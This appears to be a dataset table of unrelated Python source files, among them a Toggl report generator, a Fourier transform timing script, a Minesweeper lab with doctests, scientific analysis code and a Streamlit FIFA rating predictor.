text stringlengths 38 1.54M |
|---|
from os import walk
import os
from os.path import isfile, basename, expanduser, join
from datetime import datetime, timedelta
import sys
import re
from generator import WeeklyReportGenerator
from toggl.printer.html import HtmlPrinter
from toggl.datasource.csv import CsvReportParser
from toggl.datasource.web import ReportApi
def guess_last_report(downloads_path):
regex = re.compile(r"(?P<from>\d{4}-\d{2}-\d{2})-(?P<to>\d{4}-\d{2}-\d{2}) details(\s\((?P<order>\d+)\))*.csv")
candidates = []
for (dir_path, dir_names, file_names) in walk(expanduser(downloads_path)):
candidates.extend(file_names)
break
report_files = []
for candidate in candidates:
parts = regex.match(basename(candidate))
if parts:
parts = parts.groupdict()
fr = datetime.strptime(parts["from"], "%Y-%m-%d")
if parts["order"] is not None:
order = int(parts["order"])
else:
order = 0
report_files.append((fr, order, candidate))
if len(report_files) == 0:
raise Exception("No candidate report files found :-(")
else:
print("Found the following report files:\n\t", [rf[2] for rf in report_files])
return join(downloads_path, sorted(report_files, key=lambda rf: (rf[0], rf[1]), reverse=True)[0][2])
def is_integer(s):
try:
int(s)
return True
except ValueError:
return False
def week_magic(day):
day_of_week = day.weekday()
to_beginning_of_week = timedelta(days=day_of_week)
beginning_of_week = day - to_beginning_of_week
to_end_of_week = timedelta(days=6 - day_of_week)
end_of_week = day + to_end_of_week
return beginning_of_week, end_of_week
def main():
if len(sys.argv) < 2:
raise Exception('Unexpected number of arguments: {0}!'.format(len(sys.argv)))
# csv ~/Downloads
if sys.argv[1] == 'csv':
if (len(sys.argv) == 3) and (isfile(sys.argv[2])):
file_path = sys.argv[2]
elif len(sys.argv) == 3:
file_path = guess_last_report(sys.argv[2])
else:
file_path = r"~/Downloads/2014-04-21-2014-04-2 details.csv"
data_source = CsvReportParser(file_path)
elif sys.argv[1] == 'web':
if len(sys.argv) >= 3 and sys.argv[2] == 'last':
since, until = week_magic(datetime.now() - timedelta(days=7))
clients = sys.argv[3:]
elif len(sys.argv) >= 3 and sys.argv[2] == 'this':
since, until = week_magic(datetime.now())
clients = sys.argv[3:]
elif len(sys.argv) >= 3 and is_integer(sys.argv[2]):
since, until = week_magic(datetime.now() - timedelta(days=7*int(sys.argv[2])))
clients = sys.argv[3:]
else:
since, until = week_magic(datetime.now())
clients = sys.argv[2:]
data_source = ReportApi(since, until, clients, debug=False)
else:
raise Exception('Unexpected data source: {0}'.format(sys.argv[1]))
report = WeeklyReportGenerator().generate(data_source)
HtmlPrinter(report).print_report()
if __name__ == "__main__":
main() |
import execjs
from login.db_helper import DatabaseHelper
from login.helper import Helper
from login.util import Util
if __name__ == '__main__':
helper = Helper()
# helper.get_friends_timeline(max_count=5)
helper.get_someone_info('') #输入contailerId
pass
|
#usr/bin/python!
import sys
import numpy as np
import matplotlib.pyplot as plt
import time
PATH="./"
OUTFILE="FT_data.txt"
INFILE="Compl_num.txt"
#----------subroutines--------------
def Read():
data=[] #data equals my fouriercoeffitients fi
try:
text = open(PATH+INFILE,'r') #open file to read
data=text.read().splitlines()
text.close()
return data
except:
print 'Something went wrong at %argv[0] subprogram Read() while reading the datafile'
sys.exit()
def Write(data):
text = open(PATH+OUTFILE,'w+') #open filen to write
for x in data:
text.write(str(x)+"\n") #write data to file
text.close()
def FT(data):
N=len(data)
# print "N"
# print N
fn=[]
map(complex,data)
map(complex,fn)
n=-N/2
i=-N/2
while n<=N/2-1:
# print "n=",n+N/2
fn.append(0.0j)
for fi in data:
fn[n+N/2]+=1.0/(N)*np.exp(-2.0*np.pi*n*1.0j*i/(N))*fi
# print i
i+=1
n+=1
i=-N/2
return fn
def FTlong(data):
N=len(data)
# print "N"
# print N
fn=[]
map(complex,data)
map(complex,fn)
n=-N/2
i=-N/2
while n<=N/2-1+N:
# print "n=",n+N/2
fn.append(0.0j)
for fi in data:
fn[n+N/2]+=1.0/(N)*np.exp(-2.0*np.pi*n*1.0j*i/(N))*fi
# print i
i+=1
n+=1
i=-N/2
return fn
def IFT(data):
N=len(data)
# print "N"
# print N
fn=[]
map(complex,fn)
n=-N/2
i=-N/2
while n<=(N/2-1):
# print "n=",n+N/2
fn.append(0.0)
for fi in data:
fn[n+N/2]+=1.0*np.exp(2.0*np.pi*n*1.0j*i/N)*fi
# print i
i+=1
n+=1
i=-N/2
return fn
def IFTlong(data):
N=len(data)
# print "N"
# print N
fn=[]
map(complex,fn)
n=-N/2
i=-N/2
while n<=(N/2-1+N):
# print "n=",n+N/2
fn.append(0.0)
for fi in data:
fn[n+N/2]+=1.0*np.exp(2.0*np.pi*n*1.0j*i/N)*fi
# print i
i+=1
n+=1
i=-N/2
return fn
#--------------Main Program---------------
def main():
fi=[]
tft=[]
tfft=[]
Nmax=200
N=2
while N<=Nmax:
i=0
fi=[]
while i<N:
fi.append(np.cos(i*2*np.pi/N)+0.j)
i+=1
N+=2
start=time.time()
FT(fi)
end=time.time()
tft.append(end-start)
start=time.time()
np.fft.fft(fi)
end=time.time()
tfft.append(end-start)
x=np.linspace(2,Nmax,Nmax/2)
plt.subplot(2,1,1)
plot2=plt.plot(x,tft)
plt.subplot(2,1,2)
plot1=plt.plot(x,tfft)
# plt.subplot(3,1,3)
# plot3=plt.plot(x1,fn)
plt.show()
if __name__=="__main__":
main()
|
# 1. 一个函数作为另一个函数的返回值
def test():
print("我是test函数")
return 'hello'
def demo():
print("我是demo函数")
return test
def bar():
print("我是bar函数")
return test()
a = bar()
print(a)
x = test()
print(x)
y = demo() # y 是test函数,相当于test函数的别名
print(y)
z = y()
print(z) # 'hello'
# 2. 一个函数作为另一个函数的参数
# 3. 函数内部再定义一个函数
def outer():
x = 10 # 在外部函数里定义了一个变量x,是一个局部变量
def inner():
# 在内部函数如何修改外部函数的局部变量
nonlocal x # 此时,这里的x不再是新增变量,而是外部的局部变量x
y = x + 1
print("y=", y)
print("outer的x变量", x)
return inner
outer()()
|
# first_list = "arp, live, strong".split(", ")
# second_list = "lively, alive, harp, sharp, armstrong".split(", ")
first_list = input().split(", ")
second_list = input().split(", ")
results = [
res for res in first_list for _res in second_list if res in _res]
# results = []
# for item in first_list:
# for second_item in second_list:
# if item in second_item:
# results.append(item)
# break
print(list(dict.fromkeys(results)))
|
#!/usr/bin/env python3
"""6.009 Lab -- Six Double-Oh Mines"""
# NO IMPORTS ALLOWED!
def dump(game):
"""
Prints a human-readable version of a game (provided as a dictionary)
"""
for key, val in sorted(game.items()):
if isinstance(val, list) and val and isinstance(val[0], list):
print(f'{key}:')
for inner in val:
print(f' {inner}')
else:
print(f'{key}:', val)
def new_nd_list(dimensions, val=0):
"""
Creates an n-dimensional array recursively.
Parameters:
dimensions (tuple): Tuple of ints, representing each dimension size
val (any): Default value for cells
Returns:
Return an n-dimensional list.
>>> new_nd_list((3,2), 5)
[[5, 5], [5, 5], [5, 5]]
>>> new_nd_list((4,3,2), '1')
[[['1', '1'], ['1', '1'], ['1', '1']], [['1', '1'], ['1', '1'], ['1', '1']], [['1', '1'], ['1', '1'], ['1', '1']], [['1', '1'], ['1', '1'], ['1', '1']]]
"""
if len(dimensions) == 0:
return val
dim = dimensions[0]
return [new_nd_list(dimensions[1:], val) for i in range(dim)]
def new_nd_diffs(n):
"""
Parameters:
n (int): Number of dimensions
Returns:
Returns a tuple of 3**n tuples of n diff values ranging from -1 to 1.
>>> tuple(new_nd_diffs(1))
((-1,), (0,), (1,))
>>> tuple(new_nd_diffs(2))
((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 0), (0, 1), (1, -1), (1, 0), (1, 1))
>>> tuple(new_nd_diffs(3))
((-1, -1, -1), (-1, -1, 0), (-1, -1, 1), (-1, 0, -1), (-1, 0, 0), (-1, 0, 1), (-1, 1, -1), (-1, 1, 0), (-1, 1, 1), (0, -1, -1), (0, -1, 0), (0, -1, 1), (0, 0, -1), (0, 0, 0), (0, 0, 1), (0, 1, -1), (0, 1, 0), (0, 1, 1), (1, -1, -1), (1, -1, 0), (1, -1, 1), (1, 0, -1), (1, 0, 0), (1, 0, 1), (1, 1, -1), (1, 1, 0), (1, 1, 1))
"""
if n == 0:
yield None
return
if n == 1:
for i in range(-1, 2):
yield (i,)
return
for diff in new_nd_diffs(1):
for subdiff in new_nd_diffs(n-1):
yield diff + subdiff
def get_surrounding_indexes(index):
"""
Get tuple of indexes surrounding provided index
by adding values of index with values of diffs provided by new_nd_diffs.
Each index is also an n-tuple of ints.
Parameters:
index (tuple): n-tuple of ints
Returns:
Returns a generator of 3**n tuples of indexes surrounding the provided index and the provided index itself.
>>> tuple(get_surrounding_indexes((0,)))
((-1,), (1,))
>>> tuple(get_surrounding_indexes((3,)))
((2,), (4,))
>>> tuple(get_surrounding_indexes((0,0)))
((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1))
>>> tuple(get_surrounding_indexes((2,2)))
((1, 1), (1, 2), (1, 3), (2, 1), (2, 3), (3, 1), (3, 2), (3, 3))
>>> tuple(get_surrounding_indexes((1, 4, 8)))
((0, 3, 7), (0, 3, 8), (0, 3, 9), (0, 4, 7), (0, 4, 8), (0, 4, 9), (0, 5, 7), (0, 5, 8), (0, 5, 9), (1, 3, 7), (1, 3, 8), (1, 3, 9), (1, 4, 7), (1, 4, 9), (1, 5, 7), (1, 5, 8), (1, 5, 9), (2, 3, 7), (2, 3, 8), (2, 3, 9), (2, 4, 7), (2, 4, 8), (2, 4, 9), (2, 5, 7), (2, 5, 8), (2, 5, 9))
"""
for diff in new_nd_diffs(len(index)):
pair = zip(index, diff)
neighbour = tuple(map(sum, pair))
if neighbour != index:
yield neighbour
def get_indexes(dimensions):
"""
Get all possible indexes for given dimensions.
Parameters:
dimensions (tuple): Tuple of ints, representing each dimension size
Returns:
Returns a generator of n-tuples
>>> tuple(get_indexes((3,)))
((0,), (1,), (2,))
>>> tuple(get_indexes((3,2)))
((0, 0), (0, 1), (1, 0), (1, 1), (2, 0), (2, 1))
"""
if len(dimensions) == 0:
yield tuple()
return
dim = dimensions[0]
if len(dimensions) == 0:
for i in range(dim):
yield (i,)
return
for i in range(dim):
for j in get_indexes(dimensions[1:]):
yield (i,) + j
def get_innermost_list(board, index):
"""
Given the n-dimensional board and n-tuple index,
return the innermost list according to the specified index
along with last element from index.
Dimension of the board and size of index must be equal.
Parameters:
board (list): n-dimensional list
index (tuple): tuple with n values
Returns:
Returns a tuple (innermost_list, index[-1]) if index is valid, otherwise (None, None)
>>> get_innermost_list([[1, 2], [3, 4]], (1, 0))
([3, 4], 0)
>>> get_innermost_list([[1, 2], [3, 4]], (-1, 2))
(None, None)
>>> get_innermost_list([[1, 2], [3, 4]], (-1, -1))
(None, None)
"""
inner = board
for i in index[:-1]:
if i < 0 or i >= len(inner):
return None, None
inner = inner[i]
i = index[-1]
if i < 0 or i >= len(inner):
return None, None
return inner, i
def set_value(board, index, val):
"""
Set the value at a specified n-tuple index in n-dimensional list.
Dimension of the list and size of index must be equal.
Parameters:
board (list): n-dimensional list
index (tuple): tuple with n values
val (any): value to set or a setter function which receives current value as parameter and returns new value
Returns:
None
"""
cell, i = get_innermost_list(board, index)
if cell is not None:
cell[i] = val(cell[i]) if callable(val) else val
def get_value(board, index):
"""
Get the value at a specified n-tuple index in n-dimensional list.
Dimension of the list and size of index must be equal.
Parameters:
board (list): n-dimensional list
index (tuple): tuple with n values
Returns:
value (any): value at a given index
>>> get_value([[1, 2], [3, 4]], (1, 0))
3
>>> get_value([[1, 2], [3, 4]], (-1, 2)) is None
True
>>> get_value([[1, 2], [3, 4]], (-1, -1)) is None
True
"""
cell, i = get_innermost_list(board, index)
return None if cell is None else cell[i]
# 2-D IMPLEMENTATION
def new_game_2d(num_rows, num_cols, bombs):
"""
Start a new game.
Return a game model dictionary with following properties:
'dimensions' - tuple with value of (num_rows, num_cols)
'state' - string, one of following values ('ongoing', 'victory', 'defeat')
'board' - 2-dimensional array, with cell values of 0-8 (number of neighbour bombs) or '.' (bomb)
'mask' - 2-dimensional array with boolean cell values, indicating which cells are revealed
Parameters:
num_rows (int): Number of rows
num_cols (int): Number of columns
bombs (list): List of bombs, given in (row, column) pairs, which are
tuples
Returns:
A game object dictionary
>>> dump(new_game_2d(2, 4, [(0, 0), (1, 0), (1, 1)]))
board:
['.', 3, 1, 0]
['.', '.', 1, 0]
dimensions: (2, 4)
mask:
[False, False, False, False]
[False, False, False, False]
state: ongoing
"""
return new_game_nd((num_rows, num_cols), bombs)
def dig_2d(game, row, col):
"""
Reveal the cell at (row, col) and set game['mask'][row][col] to True.
If the revealed cell has the bomb, change game state to 'defeat'.
If the cell has no adjacent bombs, recursively reveal its direct neighbours.
If all the cells except the bomb cells are revealed, change game state to 'victory'.
Return number of revealed cells in total.
Parameters:
game (dict): Game object
row (int): Where to start digging (row)
col (int): Where to start digging (col)
Returns:
int: the number of new cells revealed
>>> game = new_game_2d(2, 4, [(0, 0), (1, 0), (1, 1)])
>>> game['mask'][0][1] = True
>>> dig_2d(game, 0, 3)
4
>>> dump(game)
board:
['.', 3, 1, 0]
['.', '.', 1, 0]
dimensions: (2, 4)
mask:
[False, True, True, True]
[False, False, True, True]
state: victory
>>> game = new_game_2d(2, 4, [(0, 0), (1, 0), (1, 1)])
>>> game['mask'][0][1] = True
>>> dig_2d(game, 0, 0)
1
>>> dump(game)
board:
['.', 3, 1, 0]
['.', '.', 1, 0]
dimensions: (2, 4)
mask:
[True, True, False, False]
[False, False, False, False]
state: defeat
"""
return dig_nd(game, (row, col))
def render_2d(game, xray=False):
"""
Prepare a game for display.
Returns a two-dimensional array (list of lists) of '_' (hidden squares), '.'
(bombs), ' ' (empty squares), or '1', '2', etc. (squares neighboring bombs).
game['mask'] indicates which squares should be visible. If xray is True (the
default is False), game['mask'] is ignored and all cells are shown.
Parameters:
game (dict): Game state
xray (bool): Whether to reveal all tiles or just the ones allowed by
game['mask']
Returns:
A 2D array (list of lists)
>>> render_2d({'dimensions': (2, 4),
... 'state': 'ongoing',
... 'board': [['.', 3, 1, 0],
... ['.', '.', 1, 0]],
... 'mask': [[False, True, True, False],
... [False, False, True, False]]}, False)
[['_', '3', '1', '_'], ['_', '_', '1', '_']]
>>> render_2d({'dimensions': (2, 4),
... 'state': 'ongoing',
... 'board': [['.', 3, 1, 0],
... ['.', '.', 1, 0]],
... 'mask': [[False, True, False, True],
... [False, False, False, True]]}, True)
[['.', '3', '1', ' '], ['.', '.', '1', ' ']]
"""
return render_nd(game, xray)
def render_ascii(game, xray=False):
"""
Render a game as ASCII art.
Returns a string-based representation of argument 'game'. Each tile of the
game board should be rendered as in the function 'render_2d(game)'.
Parameters:
game (dict): Game state
xray (bool): Whether to reveal all tiles or just the ones allowed by
game['mask']
Returns:
A string-based representation of game
>>> print(render_ascii({'dimensions': (2, 4),
... 'state': 'ongoing',
... 'board': [['.', 3, 1, 0],
... ['.', '.', 1, 0]],
... 'mask': [[True, True, True, False],
... [False, False, True, False]]}))
.31_
__1_
"""
result = render_2d(game, xray)
result = [''.join(row) for row in result]
return '\n'.join(result)
# N-D IMPLEMENTATION
def new_game_nd(dimensions, bombs):
"""
Start a new game.
Return a game model dictionary with following properties:
'dimensions' - sames as input dimensions
'state' - string, one of following values ('ongoing', 'victory', 'defeat')
'board' - 2-dimensional array, with cell values of 0-8 (number of neighbour bombs) or '.' (bomb)
'mask' - 2-dimensional array with boolean cell values, indicating which cells are revealed
Parameters:
dimensions (tuple): Dimensions of the board
bombs (list): Bomb locations as a list of lists, each an
N-dimensional coordinate
Returns:
A game object dictionary
>>> g = new_game_nd((2, 4, 2), [(0, 0, 1), (1, 0, 0), (1, 1, 1)])
>>> dump(g)
board:
[[3, '.'], [3, 3], [1, 1], [0, 0]]
[['.', 3], [3, '.'], [1, 1], [0, 0]]
dimensions: (2, 4, 2)
mask:
[[False, False], [False, False], [False, False], [False, False]]
[[False, False], [False, False], [False, False], [False, False]]
state: ongoing
"""
board = new_nd_list(dimensions, 0)
mask = new_nd_list(dimensions, False)
def setter(val):
if val is not None and val != '.':
return val + 1
return val
for bomb in bombs:
set_value(board, bomb, '.')
for index in get_surrounding_indexes(bomb):
set_value(board, index, setter)
return {
'dimensions': dimensions,
'board' : board,
'mask' : mask,
'state': 'ongoing',
}
def dig_nd(game, coordinates, cache={}):
"""
Reveal the cell at coordinates and set game['mask'] at coordinates to True.
If the revealed cell has the bomb, change game state to 'defeat'.
If the cell has no adjacent bombs, recursively reveal its direct neighbours.
If all the cells except the bomb cells are revealed, change game state to 'victory'.
Return number of revealed cells in total.
Parameters:
game (dict): Game object
coordinates (tuple): Where to start digging
Returns:
int: the number of new cells revealed
>>> g = new_game_nd((2, 4, 2), [(0, 0, 1), (1, 0, 0), (1, 1, 1)])
>>> g['mask'][0][1][1] = True
>>> dig_nd(g, (0, 3, 0))
8
>>> dump(g)
board:
[[3, '.'], [3, 3], [1, 1], [0, 0]]
[['.', 3], [3, '.'], [1, 1], [0, 0]]
dimensions: (2, 4, 2)
mask:
[[False, False], [False, True], [True, True], [True, True]]
[[False, False], [False, False], [True, True], [True, True]]
state: ongoing
>>> g = new_game_nd((2, 4, 2), [(0, 0, 1), (1, 0, 0), (1, 1, 1)])
>>> g['mask'][0][1][1] = True
>>> dig_nd(g, (0, 0, 1))
1
>>> dump(g)
board:
[[3, '.'], [3, 3], [1, 1], [0, 0]]
[['.', 3], [3, '.'], [1, 1], [0, 0]]
dimensions: (2, 4, 2)
mask:
[[False, True], [False, True], [False, False], [False, False]]
[[False, False], [False, False], [False, False], [False, False]]
state: defeat
"""
if game['state'] in ('defeat', 'victory'):
return 0
board = game['board']
mask = game['mask']
if get_value(mask, coordinates):
return 0
set_value(mask, coordinates, True)
val = get_value(board, coordinates)
if val == '.':
game['state'] = 'defeat'
return 1
if 'board' not in cache or cache['board'] != board:
covered = 0
bombs = 0
for index in get_indexes(game['dimensions']):
covered += 0 if get_value(mask, index) else 1
bombs += 1 if get_value(board, index) == '.' else 0
cache['covered'] = covered
cache['bombs'] = bombs
cache['board'] = board
else:
cache['covered'] -= 1
covered = cache['covered']
bombs = cache['bombs']
if covered == bombs:
game['state'] = 'victory'
return 1
revealed = 1
if val == 0:
for nindex in get_surrounding_indexes(coordinates):
shown = get_value(mask, nindex)
if shown is not None and not shown and get_value(board, nindex) != '.':
revealed += dig_nd(game, nindex)
return revealed
def render_nd(game, xray=False):
"""
Prepare the game for display.
Returns an N-dimensional array (nested lists) of '_' (hidden squares),
'.' (bombs), ' ' (empty squares), or '1', '2', etc. (squares
neighboring bombs). The mask indicates which squares should be
visible. If xray is True (the default is False), the mask is ignored
and all cells are shown.
Args:
xray (bool): Whether to reveal all tiles or just the ones allowed by
the mask
Returns:
An n-dimensional array of strings (nested lists)
>>> g = {'dimensions': (2, 4, 2),
... 'board': [[[3, '.'], [3, 3], [1, 1], [0, 0]],
... [['.', 3], [3, '.'], [1, 1], [0, 0]]],
... 'mask': [[[False, False], [False, True], [True, True], [True, True]],
... [[False, False], [False, False], [True, True], [True, True]]],
... 'state': 'ongoing'}
>>> render_nd(g, False)
[[['_', '_'], ['_', '3'], ['1', '1'], [' ', ' ']],
[['_', '_'], ['_', '_'], ['1', '1'], [' ', ' ']]]
>>> render_nd(g, True)
[[['3', '.'], ['3', '3'], ['1', '1'], [' ', ' ']],
[['.', '3'], ['3', '.'], ['1', '1'], [' ', ' ']]]
"""
def helper(board, mask):
for i in range(len(board)):
cell = board[i]
if isinstance(cell, list):
yield list(helper(cell, mask[i]))
else:
val = (' ' if cell == 0 else str(cell)) if xray or mask[i] else '_'
yield val
board = game['board']
mask = game['mask']
return list(helper(board, mask))
if __name__ == "__main__":
# Test with doctests. Helpful to debug individual lab.py functions.
import doctest
_doctest_flags = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS
doctest.testmod(optionflags=_doctest_flags) #runs ALL doctests
# Alternatively, can run the doctests JUST for specified function/methods,
# e.g., for render_2d or any other function you might want. To do so, comment
# out the above line, and uncomment the below line of code. This may be
# useful as you write/debug individual doctests or functions. Also, the
# verbose flag can be set to True to see all test results, including those
# that pass.
#
# doctest.run_docstring_examples(get_surrounding_indexes, globals(), optionflags=_doctest_flags, verbose=False)
|
from model_and_config import config, models
import os
import argparse
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
parser = argparse.ArgumentParser()
parser.add_argument('--model_name', type=str, default='LSTMCapsNet', help='name of the model')
args = parser.parse_args()
model = {'LSTMCapsNet': models.LSTMCapsNet}
con = config.Config()
con.load_test_data()
con.set_test_model(model[args.model_name])
a = list(range(2, 15))
con.set_epoch_range(a)
con.test()
|
# We need to import the filter we are going to use
from KalmanFilter import *
import numpy
import ms5837
import time
class DepthSensor:
currentDepth = 0; # Relative to the MSL
self.sensor = ms5837.MS5837_30BA()
# A is the matrix we need to create that converts the last state to the new one, in our case it's just 1 because we get depth measurements directly
A = numpy.matrix([1])
# H is the matrix we need to create that converts sensors readings into state variables, since we get the readings directly from the sensor this is 1
H = numpy.matrix([1])
# B is the control matrix, since this is a 1D case and because we have no inputs that we can change we can set this to zero.
B = 0
# Q is the process covariance, since we want accurate values we set this to a very low value
Q = numpy.matrix([0.00001])
# R is the measurement covariance, using a conservative estimate of 0.1 is fair
R = numpy.matrix([0.1])
# IC is the original prediction of the depth, setting this to normal room conditions makes sense
IC = self.currentDepth
# P is the initial prediction of the covariance, setting it to 1 is reasonable
P = numpy.matrix([1])
# We must initialize the sensor before reading it
self.sensor.init()
# Create the filter
self._filter = KalmanFilter(A,B,H,IC,P,Q,R)
def UpdateValue(self):
if (self.sensor.read()):
self._filter.Step(numpy.matrix([0]),numpy.matrix([self.sensor.depth()]))
self.currentDepth = self._filter.GetCurrentState()[0,0]
return [self.sensor.depth(),self.currentDepth] |
from django.apps import AppConfig
class ProductosserviciosConfig(AppConfig):
name = 'productosServicios'
|
import numpy as np
import matplotlib.pyplot as plt
from ProtWaterPES import Dipole
import multiprocessing as mp
from Imp_samp_testing import EckartsSpinz
from Imp_samp_testing import MomentOfSpinz
har2wave = 219474.6
ang2bohr = 1.e-10/5.291772106712e-11
ref = np.array([
[0.000000000000000, 0.000000000000000, 0.000000000000000],
[-2.304566686034061, 0.000000000000000, 0.000000000000000],
[-2.740400260927908, 1.0814221449986587E-016, -1.766154718409233],
[2.304566686034061, 0.000000000000000, 0.000000000000000],
[2.740400260927908, 1.0814221449986587E-016, 1.766154718409233],
])
me = 9.10938356e-31
Avo_num = 6.0221367e23
m_O = 15.994915 / (Avo_num*me*1000)
m_H = 1.007825 / (Avo_num*me*1000)
m_D = 2.01410177812 / (Avo_num*me*1000)
mass = np.array([m_H, m_O, m_H, m_O, m_H])
MOM = MomentOfSpinz(ref, mass)
ref = MOM.coord_spinz()
def all_dists(coords):
bonds = [[1, 2], [3, 4], [1, 3], [1, 0]]
cd1 = coords[:, tuple(x[0] for x in np.array(bonds))]
cd2 = coords[:, tuple(x[1] for x in np.array(bonds))]
dis = np.linalg.norm(cd2 - cd1, axis=2)
a_oh = 1/np.sqrt(2)*(dis[:, 0]-dis[:, 1])
s_oh = 1/np.sqrt(2)*(dis[:, 0]+dis[:, 1])
mid = dis[:, 2]/2
sp = mid - dis[:, -1]*np.cos(roh_roo_angle(coords, dis[:, -2], dis[:, -1]))
return np.vstack((a_oh, dis[:, 0], dis[:, 1], s_oh, dis[:, -2], sp)).T
def roh_roo_angle(coords, roo_dist, roh_dist):
v1 = (coords[:, 1]-coords[:, 3])/np.broadcast_to(roo_dist[:, None], (len(roo_dist), 3))
v2 = (coords[:, 1]-coords[:, 0])/np.broadcast_to(roh_dist[:, None], (len(roh_dist), 3))
v1_new = np.reshape(v1, (v1.shape[0], 1, v1.shape[1]))
v2_new = np.reshape(v2, (v2.shape[0], v2.shape[1], 1))
aang = np.arccos(np.matmul(v1_new, v2_new).squeeze())
return aang
class DipHolder:
dip = None
@classmethod
def get_dip(cls, coords):
if cls.dip is None:
cls.dip = Dipole(coords.shape[1])
return cls.dip.get_dipole(coords)
get_dip = DipHolder.get_dip
def dip(coords):
coords = np.array_split(coords, mp.cpu_count()-1)
V = pool.map(get_dip, coords)
dips = np.concatenate(V)
return dips
pool = mp.Pool(mp.cpu_count()-1)
ground_coords = np.zeros((10, 27, 5000, 5, 3))
ground_erefs = np.zeros((10, 20000))
ground_weights = np.zeros((10, 27, 5000))
for i in range(10):
blah = np.load(f'ground_state_2d_h3o2_{i+1}.npz')
coords = blah['coords']
eref = blah['Eref']
weights = blah['weights']
ground_coords[i] = coords
ground_erefs[i] = eref
ground_weights[i] = weights
print(np.mean(np.mean(ground_erefs[:, 5000:], axis=1), axis=0)*har2wave)
average_zpe = np.mean(np.mean(ground_erefs[:, 5000:], axis=1), axis=0)*har2wave
std_zpe = np.std(np.mean(ground_erefs[:, 5000:]*har2wave, axis=1))
# excite_neg_coords = np.zeros((5, 27, 5000, 5, 3))
# excite_neg_erefs = np.zeros((5, 20000))
# excite_neg_weights = np.zeros((5, 27, 5000))
# for i in range(5):
# blah = np.load(f'XH_excite_state_h3o2_{i+1}.npz')
# coords = blah['coords']
# eref = blah['Eref']
# weights = blah['weights']
# excite_neg_coords[i] = coords
# excite_neg_erefs[i] = eref
# excite_neg_weights[i] = weights
|
from typing import Tuple
from generator.exceptions import GeneratorBufferError
from generator.buffers.buffer import Buffer
from generator.widget_base import Widget
class NavigationBuffer(Buffer):
def __init__(self):
super().__init__()
self._navigation_state = (0, 0) # line, pos in line
def make_command(self):
pass
def put(self, nav_state: Tuple[int, int]):
"""
:param nav_state: First position is line in file, second is position in line
"""
if nav_state[0] >= 0 and nav_state[1] >= 0:
self._navigation_state = nav_state
else:
raise GeneratorBufferError('Cannot set navigation to negative lines in NavigationBuffer.')
def peek(self):
return self._navigation_state
def clear(self):
self._navigation_state = (0, 0)
class NavigationBufferWidget(Widget):
def __init__(self, nav_buffer: Buffer):
self._buffer = nav_buffer
def display(self, screen, *args, **kwargs):
"""
:param args: should be (y, x) with position to display on the screen
:param kwargs: optional reverse argument. If set, the x position is assumed to be the end position
:return None
"""
text = "{}L:{}c".format(self._buffer.peek()[0], self._buffer.peek()[1])
y, x = args[0]
if 'reverse' in kwargs and kwargs['reverse'] is True:
x = self.cols(screen) - len(text) - 1
screen.addstr(y, x, text)
|
#!/usr/bin/python
from numpy import *
import pylab as lab
n, dt = 200, 0.5
x,y = meshgrid(arange(n,dtype=float32)/n, arange(n,dtype=float32)/n)
u = exp(-((x-0.2)*20.)**2 -((y-0.3)*20.)**2)
v = zeros((n,n), dtype=float32)
lab.ion()
image = lab.imshow(u, cmap='cool')
for i in range(100000):
v[1:-1,1:-1] -= (4.*u[1:-1,1:-1]-u[:-2,1:-1]-
u[2:,1:-1]-u[1:-1,:-2]-u[1:-1,2:])*dt
u[1:-1,1:-1] += v[1:-1,1:-1] * dt
if i % 10 == 0:
image.set_data(u)
image.autoscale()
lab.draw()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 13 02:20:31 2020
@author:
"""
# -*- coding: utf-8 -*-
"""
Created on Fri May 15 12:50:04 2020
@author: Dhruv.Shah
"""
import numpy as np
import pickle
import pandas as pd
#from flasgger import Swagger
import streamlit as st
from PIL import Image
#app=Flask(__name__)
#Swagger(app)
pickle_in = open("fifa.pkl","rb")
predicter=pickle.load(pickle_in)
#@app.route('/')
def welcome():
image = Image.open('https://www.google.com/url?sa=i&url=https%3A%2F%2Fwww.kolpaper.com%2F4803%2Ffifa-20-bvb-wallpaper%2F&psig=AOvVaw2enWW8sVHm1RiM4UCp67LL&ust=1593449103566000&source=images&cd=vfe&ved=0CAIQjRxqFwoTCOCXnNr6pOoCFQAAAAAdAAAAABAD.jpg')
st.image(image, caption=None, width=None, use_column_width=False, clamp=False, channels='RGB', format='JPEG')
return "Welcome All"
#@app.route('/predict',methods=["Get"])
def predict_overall(WeakFoot, HeadingAccuracy, Dribbling,SprintSpeed
,Reactions,Strength,Interceptions, shooting_attributes
,passing_attribtes):
"""Let's Authenticate the Banks Note
This is using docstrings for specifications.
---
parameters:
- name: variance
in: query
type: number
required: true
- name: skewness
in: query
type: number
required: true
- name: curtosis
in: query
type: number
required: true
- name: entropy
in: query
type: number
required: true
responses:
200:
description: The output values
"""
prediction=predicter.predict([[WeakFoot, HeadingAccuracy, Dribbling, SprintSpeed, Reactions,Strength, Interceptions, shooting_attributes,passing_attribtes]])
print(prediction)
return prediction
def main():
image = Image.open('fifa.jpg')
st.image(image, caption=None, width=None, use_column_width=False, clamp=False, channels='RGB', format='JPEG')
st.title("Fifa Overall predictor")
html_temp = """
<div style="background-color:tomato;padding:10px">
<h2 style="color:white;text-align:center;">Fifa Overall predictor ML App </h2>
</div>
"""
st.markdown(html_temp,unsafe_allow_html=True)
#WeakFoot = st.number_input("Weak Foot",min_value=None)
HeadingAccuracy = st.slider("HeadingAccuracy",min_value=None)
Dribbling = st.slider("Dribbling",min_value=None)
SprintSpeed = st.slider("SprintSpeed",min_value=None)
Reactions = st.slider("Reactions",min_value=None)
Strength = st.slider("Strength",min_value=None)
Interceptions = st.slider("Interceptions",min_value=None)
shooting_attributes = st.slider("shooting_attributes",min_value=None)
passing_attribtes = st.slider("passing_attribtes",min_value=None )
result=""
if st.button("Predict"):
result=predict_overall(int(3), HeadingAccuracy, Dribbling,SprintSpeed
,Reactions,Strength,Interceptions, shooting_attributes
,passing_attribtes)
st.success('The predicted Overall is {}'.format(result))
if st.button("Click to know some facts about the 'Beautifull Game'"):
st.text("FIFA has always ensured that regions across the world get customized covers. From Rooney in England to Ronaldinho in Brazil; popular regions also have access to customized club covers, which can be easily downloaded.")
st.text("Soccer is the only major world sport in which you can't use your hands to manipulate the ball or object of play")
